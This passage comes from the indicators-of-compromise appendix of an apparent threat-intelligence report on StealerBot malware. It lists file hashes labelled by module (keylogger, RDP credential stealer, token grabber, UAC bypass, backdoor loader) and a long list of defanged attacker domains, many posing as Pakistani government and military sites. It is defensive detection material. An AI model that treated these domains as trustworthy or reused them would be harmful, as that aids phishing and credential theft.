rel="noopener">92dd91a5e3dfb6260e13c8033b729e03</a><br /> <a href="https://opentip.kaspersky.com/515d2d6f91ba4b76847301855dfc0e83/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7e83834c8b2c1714&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">515d2d6f91ba4b76847301855dfc0e83</a><br /> <a href="https://opentip.kaspersky.com/3ede84d84c02aa7483eb734776a20dea/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ecb56291ba27d85c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3ede84d84c02aa7483eb734776a20dea</a><br /> <a href="https://opentip.kaspersky.com/2011658436a7b04935c06f59a5db7161/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______04a81c27b58a0a51&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2011658436a7b04935c06f59a5db7161</a></p> <h3 id="stealerbot">StealerBot</h3> <p><a href="https://opentip.kaspersky.com/3a036a1846bfeceb615101b10c7c910e/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d8b1412582bcfdac&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3a036a1846bfeceb615101b10c7c910e</a>          Orchestrator<br /> <a href="https://opentip.kaspersky.com/47f51c7f31ab4a0d91a0f4c07b2f99d7/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ef1773cb2fce71cd&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">47f51c7f31ab4a0d91a0f4c07b2f99d7</a>         Keylogger<br /> <a href="https://opentip.kaspersky.com/f3058ac120a2ae7807f36899e27784ea/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______78c3c19db4d047b1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">f3058ac120a2ae7807f36899e27784ea</a>       Screenshot grabber<br /> <a 
href="https://opentip.kaspersky.com/0fbb71525d65f0196a9bfbffea285b18/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f02e466ecd567933&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0fbb71525d65f0196a9bfbffea285b18</a>          File stealer<br /> <a href="https://opentip.kaspersky.com/1ed7ad166567c46f71dc703e55d31c7a/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______32db391a520fe0fc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1ed7ad166567c46f71dc703e55d31c7a</a>         Live Console<br /> <a href="https://opentip.kaspersky.com/2f0e150e3d6dbb1624c727d1a641e754/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ec31e2f509744a27&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2f0e150e3d6dbb1624c727d1a641e754</a>         RDP Credential Stealer<br /> <a href="https://opentip.kaspersky.com/bf16760ee49742225fdb2a73c1bd83c7/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b17793f1dca0b4c7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">bf16760ee49742225fdb2a73c1bd83c7</a>         RDP Credential Stealer &#8211; Injected library<br /> mscorlib.dll<br /> <a href="https://opentip.kaspersky.com/b3650a88a50108873fc45ad3c249671a/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6bab8a98a0dc967f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b3650a88a50108873fc45ad3c249671a</a>       Token Grabber<br /> <a href="https://opentip.kaspersky.com/4c40fcb2a12f171533fc070464db96d1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ae1c7cb78a6619f9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4c40fcb2a12f171533fc070464db96d1</a>          Credential Phisher &#8211; Injected library<br /> <a 
href="https://opentip.kaspersky.com/eef9c0a9e364b4516a83a92592ffc831/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b63508af722da44f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">eef9c0a9e364b4516a83a92592ffc831</a>         UACBypass</p> <h3 id="syncbotservicehijack-dll">SyncBotServiceHijack.dll</h3> <p><a href="https://opentip.kaspersky.com/1be93704870afd0b22a4475014f199c3/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______11527cb09939852d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1be93704870afd0b22a4475014f199c3</a></p> <h3 id="service-hijack">Service Hijack</h3> <p><a href="https://opentip.kaspersky.com/f840c721e533c05d152d2bc7bf1bc165/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7ff997d33f64e974&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">f840c721e533c05d152d2bc7bf1bc165</a> Manage.exe</p> <h3 id="backdoor-loader-devobj-dll">Backdoor Loader devobj.dll</h3> <p><a href="https://opentip.kaspersky.com/5718c0d69939284ce4f6e0ce580958df/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ddc4118daf33f574&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5718c0d69939284ce4f6e0ce580958df</a></p> <h3 id="domains-and-ips">Domains and IPs</h3> <p><a href="https://opentip.kaspersky.com/126-com.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7ca7f1adddad027a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">126-com[.]live</a><br /> <a href="https://opentip.kaspersky.com/163inc.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9f4cb0cd7977ac30&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">163inc[.]com</a><br /> <a 
href="https://opentip.kaspersky.com/afmat.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f03d65a172ef0974&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">afmat[.]tech</a><br /> <a href="https://opentip.kaspersky.com/alit.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______84c5f580c401e22b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">alit[.]live</a><br /> <a href="https://opentip.kaspersky.com/aliyum.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c4c522ddbd29ace4&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">aliyum[.]tech</a><br /> <a href="https://opentip.kaspersky.com/aliyumm.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cdc030b896631d2a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">aliyumm[.]tech</a><br /> <a href="https://opentip.kaspersky.com/asyn.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1016a18c7fdf014f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">asyn[.]info</a><br /> <a href="https://opentip.kaspersky.com/ausibedu.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5bec1036358a94b2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ausibedu[.]org</a><br /> <a href="https://opentip.kaspersky.com/bol-south.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______65acce70e5f62bff&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">bol-south[.]org</a><br /> <a href="https://opentip.kaspersky.com/cnsa-gov.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f6f9ce15dfc881da&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">cnsa-gov[.]org</a><br /> <a 
href="https://opentip.kaspersky.com/colot.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______92cd059db8c72398&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">colot[.]info</a><br /> <a href="https://opentip.kaspersky.com/comptes.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a9d9e2db7fdb73f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">comptes[.]tech</a><br /> <a href="https://opentip.kaspersky.com/condet.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______002f2abdbb738f2e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">condet[.]org</a><br /> <a href="https://opentip.kaspersky.com/conft.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ae784f575c0525e2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">conft[.]live</a><br /> <a href="https://opentip.kaspersky.com/dafpak.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2c2ecc5d9eb4460d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dafpak[.]org</a><br /> <a href="https://opentip.kaspersky.com/decoty.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6124486df1f45cdc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">decoty[.]tech</a><br /> <a href="https://opentip.kaspersky.com/defenec.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5bd235c638b65a15&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">defenec[.]net</a><br /> <a href="https://opentip.kaspersky.com/defpak.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a51a20578894dbd6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">defpak[.]org</a><br /> <a 
href="https://opentip.kaspersky.com/detru.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______79395aedddc6d8fe&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">detru[.]info</a><br /> <a href="https://opentip.kaspersky.com/dgps-govpk.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1239fb0e6f6ae8c2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dgps-govpk[.]co</a><br /> <a href="https://opentip.kaspersky.com/dgps-govpk.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ef0b9fa383daf193&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dgps-govpk[.]com</a><br /> <a href="https://opentip.kaspersky.com/dinfed.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d9ad4ec1db09a12e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dinfed[.]co</a><br /> <a href="https://opentip.kaspersky.com/dirctt88.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______820e5b706c1d2d29&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dirctt88[.]co</a><br /> <a href="https://opentip.kaspersky.com/dirctt88.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3944e8ff48904e17&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dirctt88[.]net</a><br /> <a href="https://opentip.kaspersky.com/direct888.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______12287946f1c3af6d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">direct888[.]net</a><br /> <a href="https://opentip.kaspersky.com/direct88.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______903340547f9440b7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">direct88[.]co</a><br /> <a 
href="https://opentip.kaspersky.com/directt888.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0747de25b38ee8a6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">directt888[.]com</a><br /> <a href="https://opentip.kaspersky.com/donwload-file.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______63ed30975862c08c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">donwload-file[.]com</a><br /> <a href="https://opentip.kaspersky.com/donwloaded.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a1962a629a1f10f0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">donwloaded[.]com</a><br /> <a href="https://opentip.kaspersky.com/donwloaded.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______704bd5ef39210923&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">donwloaded[.]net</a><br /> <a href="https://opentip.kaspersky.com/dowmload.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______46b2c15e028ac508&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dowmload[.]net</a><br /> <a href="https://opentip.kaspersky.com/downld.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1fbc1b89ede0dc83&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">downld[.]net</a><br /> <a href="https://opentip.kaspersky.com/download-file.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4bdbd18ec0d66843&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">download-file[.]net</a><br /> <a href="https://opentip.kaspersky.com/downloadabledocx.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______215e034441c5dd88&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">downloadabledocx[.]com</a><br /> <a href="https://opentip.kaspersky.com/dynat.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______16a7c168bc0a55d1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dynat[.]tech</a><br /> <a href="https://opentip.kaspersky.com/dytt88.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0dbd955db77de97e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dytt88[.]org</a><br /> <a href="https://opentip.kaspersky.com/e1ix.mov/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cddb607f9c6e91ad&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e1ix[.]mov</a><br /> <a href="https://opentip.kaspersky.com/e1x.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3b0c4530879f657e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e1x[.]tech</a><br /> <a href="https://opentip.kaspersky.com/fia-gov.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______330c94ec385f4bc8&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fia-gov[.]com</a><br /> <a href="https://opentip.kaspersky.com/fia-gov.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______34a00483274058a6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fia-gov[.]net</a><br /> <a href="https://opentip.kaspersky.com/gov-govpk.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______40c68b82f0b4f0b2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">gov-govpk[.]info</a><br /> <a href="https://opentip.kaspersky.com/govpk.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______44801aa00edbff9b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">govpk[.]info</a><br /> <a href="https://opentip.kaspersky.com/govpk.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______26ebfc6dedd5e46d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">govpk[.]net</a><br /> <a href="https://opentip.kaspersky.com/grouit.tech/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______21a394cea51efb21&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">grouit[.]tech</a><br /> <a href="https://opentip.kaspersky.com/gtrec.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e60c51a953362e12&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">gtrec[.]info</a><br /> <a href="https://opentip.kaspersky.com/healththebest.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a1eb120494b867eb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">healththebest[.]com</a><br /> <a href="https://opentip.kaspersky.com/jmicc.xyz/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6884bb5a885004cf&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">jmicc[.]xyz</a><br /> <a href="https://opentip.kaspersky.com/kernet.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______76ff8c60bf4d6de5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">kernet[.]info</a><br /> <a href="https://opentip.kaspersky.com/kretic.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b81f4912a66cc080&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">kretic[.]info</a><br /> <a href="https://opentip.kaspersky.com/lforvk.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______802aeceaf8efaf4d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">lforvk[.]com</a><br /> <a href="https://opentip.kaspersky.com/mfa-gov.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9aac0324133e84ba&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mfa-gov[.]info</a><br /> <a href="https://opentip.kaspersky.com/mfa-gov.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b2a0603f9049402c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mfa-gov[.]net</a><br /> <a href="https://opentip.kaspersky.com/mfa-govt.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______835d31e80d3f54b5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mfa-govt[.]net</a><br /> <a href="https://opentip.kaspersky.com/mfacom.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______509741667beb9c03&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mfacom[.]org</a><br /> <a href="https://opentip.kaspersky.com/mfagov.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7d42b0209a55622d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mfagov[.]org</a><br /> <a href="https://opentip.kaspersky.com/mfas.pro/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8b716d6be69e3b4b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mfas[.]pro</a><br /> <a href="https://opentip.kaspersky.com/mitlec.site/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8c4af46205df9c46&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mitlec[.]site</a><br /> <a href="https://opentip.kaspersky.com/mod-gov-pk.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6751dce5bbc207a5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">mod-gov-pk[.]live</a><br /> <a href="https://opentip.kaspersky.com/mofa.email/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d67b1ace13a69f4e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mofa[.]email</a><br /> <a href="https://opentip.kaspersky.com/mofagovs.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2db6644d23fe660b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mofagovs[.]org</a><br /> <a href="https://opentip.kaspersky.com/moittpk.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e8fd45f2ecc180ac&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">moittpk[.]net</a><br /> <a href="https://opentip.kaspersky.com/moittpk.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ac28e6e8fffcc504&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">moittpk[.]org</a><br /> <a href="https://opentip.kaspersky.com/mshealthcheck.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4231079b673d4d3e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mshealthcheck[.]live</a><br /> <a href="https://opentip.kaspersky.com/nactagovpk.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ead1013d93e8be26&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">nactagovpk[.]org</a><br /> <a href="https://opentip.kaspersky.com/navy-mil.co/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______141ec9ee886ea779&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">navy-mil[.]co</a><br /> <a href="https://opentip.kaspersky.com/newmofa.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c20a690404e92062&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">newmofa[.]com</a><br /> <a href="https://opentip.kaspersky.com/newoutlook.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______796c069012b1c416&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">newoutlook[.]live</a><br /> <a href="https://opentip.kaspersky.com/nopler.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9b5cceb44707229c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">nopler[.]live</a><br /> <a href="https://opentip.kaspersky.com/ntcpak.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2661d780c462094e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ntcpak[.]live</a><br /> <a href="https://opentip.kaspersky.com/ntcpak.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fa0fcfe958ec54b0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ntcpak[.]org</a><br /> <a href="https://opentip.kaspersky.com/ntcpk.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______36cd7902b7b4de97&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ntcpk[.]info</a><br /> <a href="https://opentip.kaspersky.com/ntcpk.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5337d66dcd389f61&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ntcpk[.]net</a><br /> <a href="https://opentip.kaspersky.com/numpy.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7eccba7dbaf599b1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">numpy[.]info</a><br /> <a href="https://opentip.kaspersky.com/numzy.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______77b2c940bb18e742&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" 
rel="noopener">numzy[.]net</a><br /> <a href="https://opentip.kaspersky.com/nventic.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d3a09ea3db8a4cce&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">nventic[.]info</a><br /> <a href="https://opentip.kaspersky.com/office-drive.live/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f824184e8a4e9891&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">office-drive[.]live</a><br /> <a href="https://opentip.kaspersky.com/pafgovt.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______63f9dcd26455e09c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">pafgovt[.]com</a><br /> <a href="https://opentip.kaspersky.com/paknavy-gov.org/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______88144d9f5daefc1b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">paknavy-gov[.]org</a><br /> <a href="https://opentip.kaspersky.com/paknavy-govpk.info/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______87ab9c1b4c69bf15&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">paknavy-govpk[.]info</a><br /> <a href="https://opentip.kaspersky.com/paknavy-govpk.net/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______87655f15ef19c89e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">paknavy-govpk[.]net</a><br /> <a href="https://opentip.kaspersky.com/pdfrdr-update.com/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c60685b07423b3ba&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">pdfrdr-update[.]com</a><br /> <a 
